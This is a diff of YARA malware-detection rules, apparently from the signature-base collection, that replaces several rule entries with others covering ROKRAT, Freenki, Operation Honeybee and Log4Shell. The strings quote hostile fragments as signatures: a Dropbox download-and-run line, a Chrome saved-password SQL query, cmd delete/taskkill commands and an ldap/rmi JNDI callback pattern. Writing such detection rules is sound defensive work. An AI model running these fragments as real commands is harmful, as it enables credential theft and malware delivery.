-            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
-            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
-            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
-            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
-            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
-            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
-            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
-            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
-            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
-            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
-            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
-        }
-		$decrypt_string = {
-            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
-            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
-            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
-            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
-            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
-            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
-            32 C0 C3
-        }
-		$init_strings = {
-            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
-            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
-            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
-            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
-            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
-            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
-        }
+		$s1 = "mssvcdll.dll" fullword ascii
+		$s2 = "https://www.google.com/index.html" fullword ascii
+		$s3 = "LOGINDLG" fullword wide
+		$s4 = "rundll" fullword ascii
+		$s5 = "%%s\\%%s%%0%dd.%%s" fullword ascii
+		$s6 = "%%s\\%%s%%0%dd" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6f7b2e00921129d18061822197111cd" or 3 of them )
 }
-rule SIGNATURE_BASE_APT_SH_Codecov_Hack_Apr21_1 : FILE
+rule SIGNATURE_BASE_ROKRAT_Malware : FILE
 {
 	meta:
-		description = "Detects manipulated Codecov bash uploader tool that has been manipulated by an unknown actor during March / April 2021"
+		description = "Detects ROKRAT Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5fb74c4-073e-53af-a207-1672e63c9a64"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://about.codecov.io/security-update/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_codecov_hack.yar#L2-L17"
+		id = "52e7e144-b704-5254-9a0f-928fbc96f877"
+		date = "2017-04-03"
+		modified = "2021-09-14"
+		reference = "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L8-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1aa7723982a1b675ba6694f1af0eb28e5926b974874580bd727cf33a3f8d893a"
+		logic_hash = "8b8fa3f97ce13e501cc25b89e2cfdaf785f1cb9f57a9dbd3461596b1bc6178c2"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00"
+		hash2 = "cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c"
 
 	strings:
-		$a1 = "Global report uploading tool for Codecov"
-		$s1 = "curl -sm 0.5 -d"
+		$x1 = "c:\\users\\appdata\\local\\svchost.exe" fullword ascii
+		$x2 = "c:\\temp\\episode3.mp4" fullword ascii
+		$x3 = "MAC-SIL-TED-FOO-YIM-LAN-WAN-SEC-BIL-TAB" ascii
+		$x4 = "c:\\temp\\%d.tmp" ascii fullword
+		$s1 = "%s%s%04d%02d%02d%02d%02d%02d.jar" fullword ascii
+		$s2 = "\\Aboard\\Acm%c%c%c.exe" ascii
+		$a1 = "ython" ascii fullword
+		$a2 = "iddler" ascii fullword
+		$a3 = "egmon" ascii fullword
+		$a6 = "iresha" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 70KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 25000KB and ( 1 of ( $x* ) or ( 5 of them ) )
 }
-rule SIGNATURE_BASE_Merlinagent
+
+rule SIGNATURE_BASE_ROKRAT_Dropper_Nov17 : FILE
 {
 	meta:
-		description = "Detects Merlin agent"
-		author = "Hilko Bengen"
-		id = "92346a3f-dce4-58db-893b-b7797fa20029"
-		date = "2017-12-26"
+		description = "Detects dropper for ROKRAT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f3156a2-6b1b-5c65-b8fa-84c0b739d703"
+		date = "2017-11-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/Ne0nd0g/merlin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_merlin_agent.yar#L2-L27"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L48-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21743230556cc11a78942de30be476ad8e73731bbda9a4feb83bd8140a703d01"
+		logic_hash = "4a444342a4fb4d10aaf8efb5c26954847ce1089c9cec37d1ab3b03e0ac566c6c"
 		score = 75
 		quality = 85
-		tags = ""
-		filetype = "pe, elf, mach"
-
-	strings:
-		$x1 = "Command output:\x0d\x0a\x0d\x0a%s"
-		$x2 = "[-]Connecting to web server at %s to update agent configuration information."
-		$x3 = "[-]%d out of %d total failed checkins"
-		$x4 = "[!}Unknown AgentControl message type received %s"
-		$x5 = "[-]Received Agent Kill Message"
-		$x6 = "[-]Received Server OK, doing nothing"
-		$x7 = "[!]There was an error with the HTTP client while performing a POST:"
-		$x8 = "[-]Sleeping for %s at %s"
-		$s1 = "Executing command %s %s %s"
-		$s2 = "[+]Host Information:"
-		$s3 = "\tHostname: %s"
-		$s4 = "\tPlatform: %s"
-		$s5 = "\tUser GUID: %s"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14"
+		hash2 = "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"
 
 	condition:
-		1 of ( $x* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and pe.imphash ( ) == "c6187b1b5f4433318748457719dd6f39"
 }
-rule SIGNATURE_BASE_Indetectables_RAT : FILE
+rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17 : FILE
 {
 	meta:
-		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
+		description = "Detects Freenki infostealer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8322822-617c-50cf-8b64-60da3a202ca5"
-		date = "2015-10-01"
-		modified = "2023-12-05"
-		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_indetectables_rat.yar#L8-L33"
+		id = "01365093-e40a-524a-8a13-217742542f1e"
+		date = "2017-11-28"
+		modified = "2023-01-06"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L63-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "840a0c92ac731d9e88d0bdccb39598e4ff476e8630ec08f6c4024a31e258ebd0"
+		logic_hash = "e823ef5506b2fdf30a6ff9bdf6eee552b767b66a6c007a30618fc212d598b540"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
-		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
-		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	strings:
-		$s1 = "Coded By M3" fullword wide
-		$s2 = "Stub Undetector M3" fullword wide
-		$s3 = "www.webmenegatti.com.br" wide
-		$s4 = "M3n3gatt1" fullword wide
-		$s5 = "TheMisterFUD" fullword wide
-		$s6 = "KillZoneKillZoneKill" fullword ascii
-		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
-		$s8 = "M3_F_U_D_M3" ascii
-		$s9 = "M3n3gatt1hack3r" fullword wide
-		$s10 = "M3n3gatt1hack3r" fullword ascii
+		$x1 = "base64Encoded=\"TVqQAAMAAAAEAAAA" ascii
+		$x2 = "command =outFile &\" sysupdate\"" fullword ascii
+		$x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
+		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
+		$s2 = "c:\\TEMP\\CrashReports\\" ascii
+		$s3 = "objShell.run command, 0, True" fullword ascii
+		$s4 = "sysDir = shell.ExpandEnvironmentStrings(\"%windir%\")" fullword ascii
+		$s5 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
+		$s6 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
+		$a1 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$a2 = "SELECT username_value, password_value, signon_realm FROM logins" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of them or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Bergsilva_Malware : FILE
+
+rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17_Export_Sig_Testing : FILE
 {
 	meta:
-		description = "Detects a malware from the same author as the Indetectables RAT"
+		description = "Detects Freenki infostealer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5f35aea6-1d80-594a-a6e0-8e8bb30bc358"
-		date = "2015-10-01"
+		id = "929f9d41-2e71-5a86-b12f-489355bdf88d"
+		date = "2017-11-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_indetectables_rat.yar#L35-L56"
+		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L94-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03b823040a057ffbef9bcb3094a672fd75e141f3e82c77548adbe1c465d329fb"
-		score = 75
+		logic_hash = "2c6d8784aa976501a77441c4e705b7fdc9654277e8cd3f6d966967fb2e1cd724"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
-		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
-
-	strings:
-		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
-		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
-		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
-		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
-		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
-		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
-		$s5 = "https://dl.dropbox.com/u/105015858" wide
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and pe.exports ( "getUpdate" ) and pe.number_of_exports == 1
 }
-rule SIGNATURE_BASE_APT_KE3CHANG_TMPFILE : APT KE3CHANG TMPFILE FILE
+rule SIGNATURE_BASE_ROKRAT_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects Strings left in TMP Files created by K3CHANG Backdoor Ketrican"
-		author = "Markus Neis, Swisscom"
-		id = "84d411af-ea3d-5862-8c2f-7caca60c1b66"
-		date = "2020-06-18"
+		description = "Detects ROKRAT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6bf3653b-1f96-5060-b6fd-82ccc83fad77"
+		date = "2017-11-28"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/a96f4f9d-c27d-490b-b5d3-e3be0a1c93e9/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ke3chang.yar#L1-L21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L110-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "75c97fe2eeb82e09f52e98d76bd529824f171da4c802b5febc1036314d8145f0"
+		logic_hash = "12641d417408ef32292204f620efa3d1347238fa1c6f63b2b6f09a6c660e9e24"
 		score = 75
 		quality = 85
-		tags = "APT, KE3CHANG, TMPFILE, FILE"
-		hash1 = "4ef11e84d5203c0c425d1a76d4bf579883d40577c2e781cdccc2cc4c8a8d346f"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$pps1 = "PSParentPath             : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
-		$pps2 = "PSPath                   : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
-		$psp1 = ": Microsoft.PowerShell.Core\\Registry" ascii
-		$s4 = "PSChildName  : PhishingFilter" fullword ascii
-		$s1 = "DisableFirstRunCustomize : 2" fullword ascii
-		$s7 = "PSChildName  : 3" fullword ascii
-		$s8 = "2500         : 3" fullword ascii
+		$s1 = "\\T+M\\Result\\DocPrint.pdb" ascii
+		$s2 = "d:\\HighSchool\\version 13\\2ndBD" ascii
+		$s3 = "e:\\Happy\\Work\\Source\\version" ascii
+		$x1 = "\\appdata\\local\\svchost.exe" ascii
+		$x2 = "c:\\temp\\esoftscrap.jpg" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5350 and filesize < 1KB and $psp1 and 1 of ( $pps* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Ke3Chang_Ketrican_Jun20_1 : FILE
+rule SIGNATURE_BASE_Honeybee_Dropper_Maldoc : FILE
 {
 	meta:
-		description = "Detects Ketrican malware"
+		description = "Detects samples from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccd8322e-c822-512a-9ac5-eabc9d09640b"
-		date = "2020-06-18"
+		id = "4e8dec29-2c0a-5760-91c9-88f67505a7f1"
+		date = "2018-03-03"
 		modified = "2023-12-05"
-		reference = "BfV Cyber-Brief Nr. 01/2020"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ke3chang.yar#L23-L42"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L13-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2806de18432dbab24f08c7c2863fd694c91192cf7df4388dfeb87b237f22257"
+		logic_hash = "8bc680a59a7bd269eea001c2c74e41ecd93a9b848210779fc7d9c24dfab7767a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "02ea0bc17875ab403c05b50205389065283c59e01de55e68cee4cf340ecea046"
-		hash2 = "f3efa600b2fa1c3c85f904a300fec56104d2caaabbb39a50a28f60e0fdb1df39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c"
+		hash2 = "0d4352322160339f87be70c2f3fe096500cfcdc95a8dea975fdfc457bd347c44"
 
 	strings:
-		$xc1 = { 00 59 89 85 D4 FB FF FF 8B 85 D4 FB FF FF 89 45
-               FC 68 E0 58 40 00 8F 45 FC E9 }
-		$op1 = { 6a 53 58 66 89 85 24 ff ff ff 6a 79 58 66 89 85 }
-		$op2 = { 8d 45 bc 50 53 53 6a 1c 8d 85 10 ff ff ff 50 ff }
+		$x1 = "cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32"
+		$x2 = "del /f /q %TEMP%\\setup.cab && cliconfg.exe"
+		$s1 = "SELECT * FROM Win32_Processor" fullword ascii
+		$s2 = "\"cmd /c `wusa " fullword ascii
+		$s3 = "sTempPathP" fullword ascii
+		$s4 = "sTempFile" fullword ascii
+		$s5 = "GetObjectz" fullword ascii
+		$s6 = "\\setup.cab" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 2 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 400KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Exploit_MS15_077_078 : FILE
+
+rule SIGNATURE_BASE_Ophoneybee_Malware_1 : FILE
 {
 	meta:
-		description = "MS15-078 / MS15-077 exploit - generic signature"
+		description = "Detects malware from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "57f6db11-9d93-53fd-ab68-c6c3eadae2da"
-		date = "2015-07-21"
+		id = "5f48434e-efe6-5cd8-85e2-eabf528e6c58"
+		date = "2018-03-03"
 		modified = "2023-12-05"
-		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2426.yar#L10-L36"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L37-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "354219a1ed88c891c64513a057266199919406309460d92792a4be509f9580a1"
+		logic_hash = "5cd37bc515bc1dd61ee58cfdf34622e4f884cc771d1fa2c793986be94b751a70"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
-		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
-		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
-		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+		hash1 = "d31fe5cfa884e04ee26f323b8d104dcaa91146f5c7c216212fd3053afaade80f"
+		hash2 = "fc2bcd38659ae83fd25b4f7091412ae9ba011612fa4dcc3ef665b2cae2a1d74f"
+		hash3 = "2c5e5c86ca4fa172341c6bcbaa50984fb168d650ae9a33f2c6e6dccc1d57b369"
+		hash4 = "439c305cd408dbb508e153caab29d17021a7430f1dbaec0c90ac750ba2136f5f"
 
 	strings:
-		$s1 = "GDI32.DLL" fullword ascii
-		$s2 = "atmfd.dll" fullword wide
-		$s3 = "AddFontMemResourceEx" fullword ascii
-		$s4 = "NamedEscape" fullword ascii
-		$s5 = "CreateBitmap" fullword ascii
-		$s6 = "DeleteObject" fullword ascii
-		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 }
-		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 }
-		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 }
-		$op3 = { 64 00 88 ff 84 03 70 03 }
+		$x1 = "cmd /c taskkill /im cliconfg.exe /f /t && del /f /q" fullword ascii
+		$x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii
+		$x3 = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv" fullword ascii
+		$x4 = "D:\\Task\\MiMul\\" ascii
+		$s1 = "[DLL_PROCESS_ATTACH]" fullword ascii
+		$s2 = "cmd /c systeminfo >%s" fullword ascii
+		$s3 = "post.txt" fullword ascii
+		$s4 = "\\temp.ini" ascii
+		$s5 = "[GetFTPAccountInfo_10001712]" fullword ascii
+		$s6 = "ComSysAppMutex" fullword ascii
+		$s7 = "From %s (%02d-%02d %02d-%02d-%02d).txt" fullword ascii
+		$s8 = "%s %s %c%s%c" fullword ascii
+		$s9 = "TO EVERYONE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or 3 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e14b59a79999cc0bc589a4cb5994692a" or pe.imphash ( ) == "64400f452e2f60305c341e08f217b02c" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Exploit_MS15_077_078_Hackingteam : FILE
+rule SIGNATURE_BASE_Ophoneybee_Maocheng_Dropper : FILE
 {
 	meta:
-		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
+		description = "Detects MaoCheng dropper from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bf40dec-c46e-5054-a98e-602049cb1824"
-		date = "2015-07-21"
+		id = "b163e08e-3892-55f6-ae3e-30d2ba3f4310"
+		date = "2018-03-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2426.yar#L38-L57"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c94582629e555c9fd0b29302720078a7eb47d3013d0c1b5edd4e060c2062fa92"
+		logic_hash = "85bcde1d821c052636a75dce4d8c3753188dd7da5fce2b3401d51c02d1c2fa6b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
-		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+		hash1 = "35904f482d37f5ce6034d6042bae207418e450f4"
 
 	strings:
-		$s1 = "\\SystemRoot\\system32\\CI.dll" ascii
-		$s2 = "\\sysnative\\CI.dll" ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii
-		$s4 = "CRTDLL.DLL" fullword ascii
-		$s5 = "\\sysnative" ascii
-		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
+		$x1 = "\\MaoCheng\\Release\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Apt28_Win_Zebrocy_Golang_Loader_Modified : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1 : CVE_2021_44228
 {
 	meta:
-		description = "Detects unpacked modified APT28/Sofacy Zebrocy Golang."
-		author = "@VK_Intel"
-		id = "cce9ba6c-954c-5b13-a058-cdf7895d63fc"
-		date = "2018-12-25"
-		modified = "2023-12-05"
-		reference = "https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_zebrocy.yar#L1-L22"
+		description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
+		author = "Florian Roth (Nextron Systems)"
+		id = "474afa96-1758-587e-8cab-41c5205e245e"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "799f4457eb2bdeeb7c9383e2b4e9572a41d9adbfe4a1a9c3b0fa1c9fc6077e40"
-		score = 75
-		quality = 79
-		tags = "FILE"
+		logic_hash = "8d5e60f91b715242c6f8ee806ab81d3e296ce1467cf2d065b053f33e3ae00f14"
+		score = 60
+		quality = 85
+		tags = "CVE-2021-44228"
 
 	strings:
-		$go = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 }
-		$init = { 6d 61 69 6e 2e 69 6e 69 74 }
-		$main = "main" ascii wide fullword
-		$scr_git = {67 69 74 68 75 62 2e 63 6f 6d 2f 6b 62 69 6e 61}
-		$s0 = "os/exec.(*Cmd).Run" fullword ascii
-		$s1 = "net/http.(*http2clientConnReadLoop).processHeaders" fullword ascii
-		$s2 = "os.MkdirAll" fullword ascii
-		$s3 = "os.Getenv" fullword ascii
-		$s4 = "os.Create" fullword ascii
-		$s5 = "io/ioutil.WriteFile" fullword ascii
+		$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and $init and all of ( $s* ) and #main > 10 and #scr_git > 5
+		1 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_1 : FILE
+rule SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects JNDI Exploit Kit patterns in files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "28ca64ac-beee-51d9-96d4-a1f6d52823ec"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L10-L26"
+		id = "a9127dd2-b818-5ca8-877a-3c47b1e92606"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://github.com/pimps/JNDI-Exploit-Kit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L16-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e024767797fb146b92d6e8c549597c0cda7c2f8fb961299a3808b9b2e924666"
-		score = 75
+		logic_hash = "9442c8c4eee76539892752361657c86e80acc7990876e787317b042a4637f669"
+		score = 60
 		quality = 85
-		tags = "FILE"
